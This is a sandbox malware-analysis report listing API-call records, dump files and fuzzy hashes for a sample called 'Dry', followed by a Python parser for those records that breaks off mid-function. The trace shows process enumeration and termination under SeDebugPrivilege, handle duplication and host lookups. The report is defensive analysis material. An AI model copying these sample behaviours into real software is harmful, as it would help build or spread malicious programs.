• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B42F70
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B42F74
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: 92f62d5b10c2665ec17b84bde10b129228d0a48493b1801085369a6e8186592d
• Instruction ID: 0d2bba82ac20e0253076b941a985675a2ebbcb3ee0a5a157db5d714293210030
• Opcode Fuzzy Hash: 92f62d5b10c2665ec17b84bde10b129228d0a48493b1801085369a6e8186592d
• Instruction Fuzzy Hash: CB01D8307842107BFB106B689C8AF593FA9DF4DB61F500055F318AF1E0CDE16444DAA9
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B41D95,?,?,00000000), ref: 00B42159
• HeapAlloc.KERNEL32(00000000,?,00B41D95,?,?,00000000), ref: 00B42160
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B41D95,?,?,00000000), ref: 00B42175
• GetCurrentProcess.KERNEL32(?,00000000,?,00B41D95,?,?,00000000), ref: 00B4217D
• DuplicateHandle.KERNEL32(00000000,?,00B41D95,?,?,00000000), ref: 00B42180
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B41D95,?,?,00000000), ref: 00B42190
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00B41D95,00000000,?,00B41D95,?,?,00000000), ref: 00B42198
                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00B41D95,?,?,00000000), ref: 00B4219B
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00B421C1,00000000,00000000,00000000), ref: 00B421B5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8bc9af364a60c33a3b09f2d7a05164402411f31a5313262aa7a36eff83ee7f41
                                                                                                                                                                                                                                                                                    • Instruction ID: a76dedbc488f6525f503f3145455fd24f354a1a1d09c764df898da9712388a56
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bc9af364a60c33a3b09f2d7a05164402411f31a5313262aa7a36eff83ee7f41
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D01A8B5240304BFE610ABA5DC49F6B7BACEB88751F414411FA09EB6A1CA709840CA20
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00B4DDAC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00B4DDBA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4DD87: CloseHandle.KERNEL32(00000000), ref: 00B4DE87
                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B6ABCA
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B6ABDD
                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B6AC10
                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B6ACC5
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00B6ACD0
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B6AD21
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                    • Opcode ID: f3e89630de846d844333910663c24bca69398a1d37b5a0650bbd3dfc4de1147a
                                                                                                                                                                                                                                                                                    • Instruction ID: 50a83a044c2980067ec243c508e63bc87276f07e36c99bb4ad6d300be62bd056
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3e89630de846d844333910663c24bca69398a1d37b5a0650bbd3dfc4de1147a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4617970208241AFDB10DF15C994F29BBE1EF54308F5884DCE46A5BBA2CB75ED85CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B743C1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00B743D6
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B743F0
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B74435
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B74462
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B74490
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                    • String ID: SysListView32
                                                                                                                                                                                                                                                                                    • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                    • Opcode ID: 19bf79ae7a0ed59135d8865bf9e94767b2658d4c76de3901221fdd8d1f8e45da
                                                                                                                                                                                                                                                                                    • Instruction ID: f80756c1329ef238bdd58a0294294ec6baff756772bbad1b8201eb9ca4af507c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19bf79ae7a0ed59135d8865bf9e94767b2658d4c76de3901221fdd8d1f8e45da
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F41C071900209ABDB219F64CC49BEA7BF9FF08350F114566F92CE7291D7719980DB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B4C6C4
                                                                                                                                                                                                                                                                                    • IsMenu.USER32(00000000), ref: 00B4C6E4
                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00B4C71A
                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(012E5FF8), ref: 00B4C76B
                                                                                                                                                                                                                                                                                    • InsertMenuItemW.USER32(012E5FF8,?,00000001,00000030), ref: 00B4C793
                                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: 9fe8f7333a5ecfc2a45e305ac0d9ac4870458ef87bc9e06c84c1777e0b1f9b52
• Instruction ID: ffba6506b42fbb900c17c330c5f8626e4f2d97371a27ce3ad27a7d70f33673d8
• Opcode Fuzzy Hash: 9fe8f7333a5ecfc2a45e305ac0d9ac4870458ef87bc9e06c84c1777e0b1f9b52
• Instruction Fuzzy Hash: 4651CF706022049BDF51CF68C8C8BAEBFF4EF54B58F24819AE81597291E7709E40EF61
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00B4D1BE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: 55a61253f89bd1208fabf11108e13bfa546343a49eecc6edaef5b5a00ed5320c
• Instruction ID: bed6cf17cbfc1a62d0b24367034716608b91c1a0f4120c24c6ef8ecc85b4c29e
• Opcode Fuzzy Hash: 55a61253f89bd1208fabf11108e13bfa546343a49eecc6edaef5b5a00ed5320c
• Instruction Fuzzy Hash: C611B77538C306BAEB055F54DC82D6A7BECDF06760B2001EAFD05B62C1DBB46F406160
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 642191829-3771769585
• Opcode ID: c805e56ab3ad5a0eb5fa24f1f2771a20b1a2d117d320031856b3963524fe567c
• Instruction ID: e06a47d1844363a19b4e2d107c2e2e8363651de9da2e41200d335d8ceebb2410
• Opcode Fuzzy Hash: c805e56ab3ad5a0eb5fa24f1f2771a20b1a2d117d320031856b3963524fe567c
• Instruction Fuzzy Hash: E711B4719041157BDB246B64DC4AEEA7BFCEF01760F0000E5F655A7091EF74DF81A650
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _wcslen$LocalTime
• String ID:
• API String ID: 952045576-0
• Opcode ID: 270b9bf38a69c4a1eaf6d49b07398274262d2d402a74dc56620a7ce17b62d8ab
• Instruction ID: 739def79a9122533c31c66f8578998a9915e4a12c6e9419b02d2ee59785bea7f
• Opcode Fuzzy Hash: 270b9bf38a69c4a1eaf6d49b07398274262d2d402a74dc56620a7ce17b62d8ab
• Instruction Fuzzy Hash: 41418165C10115A9DB11EBF88886ADFBBE8AF05310F5084A2E508E31A1FB34D761C3A6
APIs
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B239E2,00000004,00000000,00000000), ref: 00AFFC41
• ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00B239E2,00000004,00000000,00000000), ref: 00B3FC15
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B239E2,00000004,00000000,00000000), ref: 00B3FC98
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: e190abea14e9e1df5a0335a3302fdb3370ddb31dbd7f3c5ba050daa9e728401c
• Instruction ID: 855822b045c80385b265dfec1b15f214960057d719c625b31f4b883463d0be44
• Opcode Fuzzy Hash: e190abea14e9e1df5a0335a3302fdb3370ddb31dbd7f3c5ba050daa9e728401c
• Instruction Fuzzy Hash: 3F41FB3150839D9EC7358B7889887397BF1EF46351F68457CFA4B47A60D631A881C711
APIs
• DeleteObject.GDI32(00000000), ref: 00B737B7
• GetDC.USER32(00000000), ref: 00B737BF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B737CA
• ReleaseDC.USER32(00000000,00000000), ref: 00B737D6
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B73812
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B73823
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B76504,?,?,000000FF,00000000,?,000000FF,?), ref: 00B7385E
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B7387D
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9d0975a5a336780e8dcf0d35a0a7bff622d2da4537e66eda17ae6c31e25d794c
                                                                                                                                                                                                                                                                                    • Instruction ID: 6627d08db45307cf7c6090a9ea4ae307f79c24b989fac663a69412b492ce4cd5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d0975a5a336780e8dcf0d35a0a7bff622d2da4537e66eda17ae6c31e25d794c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41319C72211214BFEB158F50CC8AFEB3BA9EF49751F044065FE0DAB291CAB59C81C7A0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                    • Opcode ID: 02537663fb7f078b9765c8499266e2e6a64e7c9f15eb19afd0a820579a81f158
                                                                                                                                                                                                                                                                                    • Instruction ID: afcd5ad3ff30dca958b283f1c94ce9c17b48490cb38b680f2ef1dd0ce91fb6c5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02537663fb7f078b9765c8499266e2e6a64e7c9f15eb19afd0a820579a81f158
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD1BF71A0060A9FDB20CFA8C885EAEB7F5FF48304F1481A9E915AB290D774ED95CB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00B2194E
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B219D1
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00B21B7B,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B21A64
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B21A7B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B06A79,?,0000015D,?,?,?,?,00B085B0,000000FF,00000000,?,?), ref: 00B13BC5
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00B21B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B21AF7
                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00B21B22
                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00B21B2E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7d5ac01fdf58097fb49c1fcfdf3433e139ccf7f860fa0201f83b756215413b24
                                                                                                                                                                                                                                                                                    • Instruction ID: 511361d52c0d1142654dd1ad5f32ca813c07951acdb6ba76c44a6cd23b15f449
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d5ac01fdf58097fb49c1fcfdf3433e139ccf7f860fa0201f83b756215413b24
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9391C671E002269EDB208F6CEC95AEE7BF5EF29710F140AA9E819E7140E735DD81C760
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                    • Opcode ID: 539be77672019f44610d856b7c0dc500381cc9d74c936819ee899b4d189c6ba3
                                                                                                                                                                                                                                                                                    • Instruction ID: e84c530569920d8dc92836ae8a31095efb332dfde2a984cc5b7a25c15c61af29
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 539be77672019f44610d856b7c0dc500381cc9d74c936819ee899b4d189c6ba3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75917A71A00619ABDF20CFA5CC88FAEBBF8EF45714F108599F519AB280D7749945CFA0
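The function records above are the useful raw material for triage, but the web rendering makes them hard to search: the same API (MultiByteToWideChar, SendMessageW) appears several times per function, subcalls are nested, and the "String ID" field packs several strings with a "$" separator. The parser below is an added example, not code from Joe Sandbox or from this report; it turns pasted records into structured objects so the analyst can ask "where is this API referenced" or "which modules does this dump call". It assumes the records are pasted as plain text with the "•" bullets intact, and that every record ends with an "Instruction Fuzzy Hash" line as the ones on this page do. The sample input is constructed from three records shown above; the helper names are the example's own.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field

# One "Name.MODULE(args), ref: ADDR" line, optionally prefixed with the
# "Part of subcall function XXXX:" marker the report uses for nested calls.
# __freea.LIBCMT style lines have no argument list and no comma before "ref".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@?]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                      # call-site address, parsed from the hex "ref"
    subcall_of: str | None = None  # set when the report marks it as part of a subcall


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    dumps: list[str] = field(default_factory=list)   # "Associated" dump files
    meta: dict[str, str] = field(default_factory=dict)  # remaining "Key: Value" fields

    @property
    def strings(self) -> list[str]:
        # "String ID" packs several strings separated by "$"; empty field -> []
        return [s for s in self.meta.get("String ID", "").split("$") if s]


def parse_report(text: str) -> list[FunctionRecord]:
    """Split pasted Joe Sandbox IDA-plugin records into FunctionRecord objects."""
    records: list[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("•"):
            line = line[1:].strip()
        if not line:
            continue
        m = API_RE.match(line)   # check API lines first: they also contain ":"
        if m:
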